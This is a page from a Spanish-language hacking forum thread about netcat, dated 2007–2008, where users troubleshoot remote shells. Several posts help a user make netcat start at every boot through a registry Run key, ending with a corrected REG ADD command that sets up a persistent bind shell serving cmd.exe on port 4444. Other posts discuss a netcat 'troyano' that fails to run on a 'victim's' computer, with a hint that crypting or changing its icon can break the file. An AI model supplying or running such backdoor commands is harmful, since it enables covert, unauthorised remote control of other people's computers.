elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Jugando con netcat
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 ... 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 [37] 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 ... 65 Ir Abajo Respuesta Imprimir
Autor Tema: Jugando con netcat  (Leído 356,208 veces)
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #360 en: 29 Diciembre 2007, 18:32 pm »

Citar
D4RIO, yo estoy a la escucha en el puerto 80 y cuando el se intenta conectar a mi ip no se conecta, sin embargo, si lo hacemos al revés el si obtiene shell.
Eso significa que no puedes abrir tu puerto en forma pública, revisa tu router y esas cosas, también que no esté en uso ese puerto por otro programa o pc dentro de la misma red si usas router, verifica tu firewall ya que también algunos antivirus lo traen incorporado, etc... si puedes hacer inversa pero no directa es porque no se está abriendo el puerto sobre tu ip pública.

En linux ya viene incorporado el netcat y si no es asi puede bajarse su código fuente y compilarlo ./configure make etc.
« Última modificación: 29 Diciembre 2007, 18:34 pm por WHK » En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #361 en: 29 Diciembre 2007, 18:44 pm »

Ya reestablecí todas las imagenes de los primeros post.
En línea

Enzo87

Desconectado Desconectado

Mensajes: 7


Ver Perfil
Re: Jugando con netcat
« Respuesta #362 en: 29 Diciembre 2007, 21:11 pm »

Citar
D4RIO, yo estoy a la escucha en el puerto 80 y cuando el se intenta conectar a mi ip no se conecta, sin embargo, si lo hacemos al revés el si obtiene shell.
Eso significa que no puedes abrir tu puerto en forma pública, revisa tu router y esas cosas, también que no esté en uso ese puerto por otro programa o pc dentro de la misma red si usas router, verifica tu firewall ya que también algunos antivirus lo traen incorporado, etc... si puedes hacer inversa pero no directa es porque no se está abriendo el puerto sobre tu ip pública.

En linux ya viene incorporado el netcat y si no es asi puede bajarse su código fuente y compilarlo ./configure make etc.

Muchas gracias WHK. El puerto que uso es el 80, que ya debería estar abierto. Y sobre revisar el router, está complicado ya que mi ISP es Tele2 y son ellos los que acceden al router  >:(
De antivirus uso Antivir de Avira, que desactivé para hacer las pruebas y el cual no lleva Firewall. De firewall uso ZoneAlarm, y le di permisos al nc.
En línea

BBOYHACK

Desconectado Desconectado

Mensajes: 169


#Bboyhacks#


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #363 en: 6 Enero 2008, 07:58 am »

como podria hacer para incluir al netcat en las aplicaciones de inicio para cada ves que el equipo inicie se ative solo se que tendria que colocarlo aqui


(HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run)


pero como podria realizarlo  desde   (msdos) hay alguna forma
En línea

lastimosamente no puedo dirigirme a un cajero de un banco y decirle alto y claro:
Soy Bill Gates y deseo retirar 2 Millones de dolares y mi codigo es Windows


Blackhacking.no-ip.org
Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Jugando con netcat
« Respuesta #364 en: 6 Enero 2008, 08:27 am »

Desde ms-dos sería algo así

Código:
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v NOMBREQUEPREFIERAS /t REG_SZ /d RUTADETUBAT
  ;D


Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
BBOYHACK

Desconectado Desconectado

Mensajes: 169


#Bboyhacks#


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #365 en: 6 Enero 2008, 09:33 am »

Desde ms-dos sería algo así

Código:
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v NOMBREQUEPREFIERAS /t REG_SZ /d RUTADETUBAT
  ;D


gracias ya lo pude incluir ahora cuando trato de incluirlo con un puerto ala escucha nada me da un error de
 
error:demasiados parametros de linia de comando

REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Nc /t REG_SZ /d C:nc.exe -l -p 4444 -t -e cmd.exe

eso es lo que coloco
En línea

lastimosamente no puedo dirigirme a un cajero de un banco y decirle alto y claro:
Soy Bill Gates y deseo retirar 2 Millones de dolares y mi codigo es Windows


Blackhacking.no-ip.org
Maestro Oscuro

Desconectado Desconectado

Mensajes: 3


Ver Perfil
Re: Jugando con netcat
« Respuesta #366 en: 6 Enero 2008, 23:06 pm »

BUen dia amigo... le escribo para pedirle ayuda en la comprensión de su explicación para crear el troyano con netcat... segui muy metodicamente los pasos que usted indico pero no funciono... en la computadora de la victima sale que no es una aplicación valida de Win32... me interesa mucho superar esta dificultad... le pido me ayude... realmente es importante...
En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Jugando con netcat
« Respuesta #367 en: 7 Enero 2008, 00:36 am »

BBOYHACK, al escribir eso te toma como si "C:\nc.exe -l -p" y "4444" fuesen parametros separados, e igualmente ocurre con los que siguen.

Intenta lo siguiente

Código:
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Nc /t REG_SZ /d "C:\nc.exe -l -p 4444 -t -e cmd.exe"
  ;)

Saludos
« Última modificación: 7 Enero 2008, 06:16 am por Novlucker » En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
BBOYHACK

Desconectado Desconectado

Mensajes: 169


#Bboyhacks#


Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #368 en: 7 Enero 2008, 06:11 am »

BUen dia amigo... le escribo para pedirle ayuda en la comprensión de su explicación para crear el troyano con netcat... segui muy metodicamente los pasos que usted indico pero no funciono... en la computadora de la victima sale que no es una aplicación valida de Win32... me interesa mucho superar esta dificultad... le pido me ayude... realmente es importante...


ok pero cual es tu problema en que parte del troyano tienes dudas dond te da el error
En línea

lastimosamente no puedo dirigirme a un cajero de un banco y decirle alto y claro:
Soy Bill Gates y deseo retirar 2 Millones de dolares y mi codigo es Windows


Blackhacking.no-ip.org
Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Jugando con netcat
« Respuesta #369 en: 7 Enero 2008, 06:19 am »

Citar
en la computadora de la victima sale que no es una aplicación valida de Win32

En tu computadora que sale?? supongo que lo mismo verdad??

Algunas veces esto ocurre porque luego de encriptarlo o cambiarle las imagenes el archivo queda dañado, y deja de funcionar.

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Páginas: 1 ... 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 [37] 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 ... 65 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines